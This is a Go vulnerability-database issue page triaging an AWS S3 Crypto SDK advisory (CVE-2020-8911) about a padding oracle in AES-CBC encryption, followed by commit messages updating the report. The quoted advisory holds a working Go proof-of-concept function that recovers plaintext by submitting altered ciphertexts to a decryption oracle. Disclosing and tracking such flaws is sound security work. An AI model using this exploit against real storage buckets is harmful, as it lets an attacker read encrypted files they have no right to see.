Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

x/vulndb: potential Go vuln in github.com/aws/aws-sdk-go/service/s3/s3crypto: GHSA-f5pg-7wfw-84q9 #646

Closed
julieqiu opened this issue Aug 1, 2022 · 6 comments
Closed

x/vulndb: potential Go vuln in github.com/aws/aws-sdk-go/service/s3/s3crypto: GHSA-f5pg-7wfw-84q9 #646

julieqiu opened this issue Aug 1, 2022 · 6 comments
Assignees
@tatianab
Labels
high priority

Comments

@julieqiu
Copy link
Member

julieqiu commented Aug 1, 2022

In GitHub Security Advisory GHSA-f5pg-7wfw-84q9, there is a vulnerability in the following Go packages or modules:

Unit Fixed Vulnerable Ranges
github.com/aws/aws-sdk-go/service/s3/s3crypto 1.34.0 < 1.34.0

See doc/triage.md for instructions on how to triage this report.

packages:
  - package: github.com/aws/aws-sdk-go/service/s3/s3crypto
    versions:
      - fixed: 1.34.0
description: |-
    ### Summary

    The golang AWS S3 Crypto SDK is impacted by an issue that can result in loss of confidentiality and message forgery. The attack requires write access to the bucket in question, and that the attacker has access to an endpoint that reveals decryption failures (without revealing the plaintext) and that when encrypting the CBC option was chosen as content cipher.

    ### Risk/Severity

    The vulnerability pose insider risks/privilege escalation risks, circumventing KMS controls for stored data.

    ### Impact

    This advisory describes the plaintext revealing vulnerabilities in the golang AWS S3 Crypto SDK, with a similar issue in the non "strict" versions of C++ and Java S3 Crypto SDKs being present as well.

    V1 prior to 1.34.0 of the S3 crypto SDK, allows users to encrypt files with AES-CBC, without computing a MAC on the data. Note that there is an alternative option of using AES-GCM, which is used in the examples of the documentation and not affected by this vulnerability, but by CVE-2020-8912.

    This exposes a padding oracle vulnerability: If the attacker has write access to the S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file (without observing the file contents that the endpoint learns in the process), they can reconstruct the plaintext with (on average) `128*length(plaintext)` queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors.

    This issue is fixed in V2 of the API, by disabling encryption with CBC mode for new files. Old files, if they have been encrypted with CBC mode, remain vulnerable until they are reencrypted with AES-GCM.

    ### Mitigation

    Using the version 2 of the S3 crypto SDK will not produce vulnerable files anymore. Old files remain vulnerable to this problem if they were originally encrypted with CBC mode.

    ### Proof of concept

    A [Proof of concept](https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc) is available in a separate github repository.

    This particular issue is described in [padding_oracle_exploit.go](https://github.com/sophieschmieg/exploits/blob/master/aws_s3_crypto_poc/exploit/padding_oracle_exploit.go):

    ```golang
    func PaddingOracleExploit(bucket string, key string, input *OnlineAttackInput) (string, error) {
    	data, header, err := input.S3Mock.GetObjectDirect(bucket, key)
    	if alg := header.Get("X-Amz-Meta-X-Amz-Cek-Alg"); alg != "AES/CBC/PKCS5Padding" {
    		return "", fmt.Errorf("Algorithm is %q, not CBC!", alg)
    	}
    	length, err := strconv.Atoi(header.Get("X-Amz-Meta-X-Amz-Unencrypted-Content-Length"))
    	padding := byte(len(data) - length)
    	plaintext := make([]byte, length)
    	for i := length - 1; i >= 0; i-- {
    		newLength := 16 * (i/16 + 1)
    		dataCopy := make([]byte, newLength)
    		headerCopy := header.Clone()
    		copy(dataCopy, data)
    		// Set Padding
    		newPadding := byte(newLength - i)
    		for j := i + 1; j < newLength; j++ {
    			var oldValue byte
    			if j >= length {
    				oldValue = padding
    			} else {
    				oldValue = plaintext[j]
    			}
    			dataCopy, headerCopy, err = xorData(oldValue^newPadding, j, dataCopy, headerCopy)
    			if err != nil {
    				return "", err
    			}
    		}
    		// Guess
    		for c := 0; c < 256; c++ {
    			dataCopy, headerCopy, err := xorData(byte(c)^newPadding, i, dataCopy, headerCopy)
    			input.S3Mock.PutObjectDirect(bucket, key+"guess", dataCopy, headerCopy)
    			if input.Oracle(bucket, key+"guess") {
    				plaintext[i] = byte(c)
    				break
    			}
    			dataCopy, headerCopy, err = xorData(byte(c)^newPadding, i, dataCopy, headerCopy)
    		}
    	}
    	return string(plaintext), nil
    }
    ```
published: 2022-02-11T23:26:26Z
last_modified: 2022-04-19T19:02:32Z
cves:
  - CVE-2020-8911
ghsas:
  - GHSA-f5pg-7wfw-84q9
links:
    context:
      - https://github.com/advisories/GHSA-f5pg-7wfw-84q9
@zpavlinovic zpavlinovic removed their assignment Aug 15, 2022
@julieqiu julieqiu self-assigned this Aug 15, 2022
@gopherbot
Copy link
Contributor

Change https://go.dev/cl/423994 mentions this issue: data/reports: add GO-2022-0646.yaml for GHSA-f5pg-7wfw-84q9

gopherbot pushed a commit that referenced this issue Aug 15, 2022
@julieqiu
data/reports: add GO-2022-0646.yaml for GHSA-f5pg-7wfw-84q9
d96585a 
For #646

Change-Id: Icd46b0f5a83bec71e6601ee0c8ef4251d7e10b62
Reviewed-on: https://go-review.googlesource.com/c/vulndb/+/423994
Reviewed-by: Damien Neil <dneil@google.com>
Reviewed-by: Julie Qiu <julieqiu@google.com>
@gopherbot
Copy link
Contributor

Change https://go.dev/cl/427335 mentions this issue: data/reports: update GO-2022-0646 to more fully cover the vulnerability

gopherbot pushed a commit that referenced this issue Sep 1, 2022
@neild
data/reports: update GO-2022-0646 to more fully cover the vulnerability
bccd26d 
There are two separate GHSAs describing AWS S3 Crypto SDK vulnerabilities
that, while technically different, have a common underlying effect:
An attacker with write access to an S3 bucket can read files in that
bucket.

(One vulnerability allows decrypting files using AES-CBC. The other
allows converting a file using AES-GCM with the KMS option to use
AES-CBC, at which point the first vulnerability can be used to
decrypt it.)

This vulnerability is fixed in the new EncryptionClientV2 API.
Users of the old EncryptionClient API remain vulnerable, even when
using newer versions of the github.com/aws/aws-sdk-go module

Update this report to describe the impact (attacker can decrypt
your files, but only if they have write access), the mitigation
(switch APIs), and to mark the V1 API vulnerable at all module
versions.

Fixes #635.
Fixes #646.

Change-Id: Ifd1e26119f40808977a1265f192e60fd199b1763
Reviewed-on: https://go-review.googlesource.com/c/vulndb/+/427335
TryBot-Result: Gopher Robot <gobot@golang.org>
Reviewed-by: Roland Shoemaker <roland@golang.org>
Run-TryBot: Damien Neil <dneil@google.com>
@tatianab tatianab mentioned this issue Sep 6, 2022
Closed
@tatianab tatianab reopened this Aug 20, 2024
@tatianab tatianab assigned tatianab and unassigned julieqiu Aug 20, 2024
@tatianab
Copy link
Contributor

Review for appropriate use of alias vs related

@gopherbot
Copy link
Contributor

Change https://go.dev/cl/629377 mentions this issue: data/reports: update GO-2022-0646

gopherbot pushed a commit that referenced this issue Nov 19, 2024
@tatianab @gopherbot
data/reports: update GO-2022-0646
c5e69da 
Add fixed version.

  - data/reports/GO-2022-0646.yaml

Fixes #3276
Updates #646

Change-Id: Ic76152e6070a28c0e865306ccd488061e15fb789
Reviewed-on: https://go-review.googlesource.com/c/vulndb/+/629377
Reviewed-by: Zvonimir Pavlinovic <zpavlinovic@google.com>
Auto-Submit: Tatiana Bradley <tatianabradley@google.com>
LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
@tatianab tatianab reopened this Dec 12, 2024
@gopherbot
Copy link
Contributor

Change https://go.dev/cl/635736 mentions this issue: data/reports: add GO-2022-0635, review GO-2022-0646

@gopherbot
Copy link
Contributor

Change https://go.dev/cl/635282 mentions this issue: data/reports: restore published version for GO-2022-0646

gopherbot pushed a commit that referenced this issue Dec 13, 2024
@tatianab
data/reports: restore published version for GO-2022-0646
a9cc2f2 
Restore historical published version that was accidentally deleted
in a previous CL. (This happened because we changed the way
we handle published times).

  - data/reports/GO-2022-0646.yaml

Updates #646

Change-Id: Ib02681c69e3b805eae705a3baffede8cc3bc358f
Reviewed-on: https://go-review.googlesource.com/c/vulndb/+/635282
Reviewed-by: Ian Cottrell <iancottrell@google.com>
LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@tatianab tatianab

Labels
high priority
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@zpavlinovic @julieqiu @tatianab @gopherbot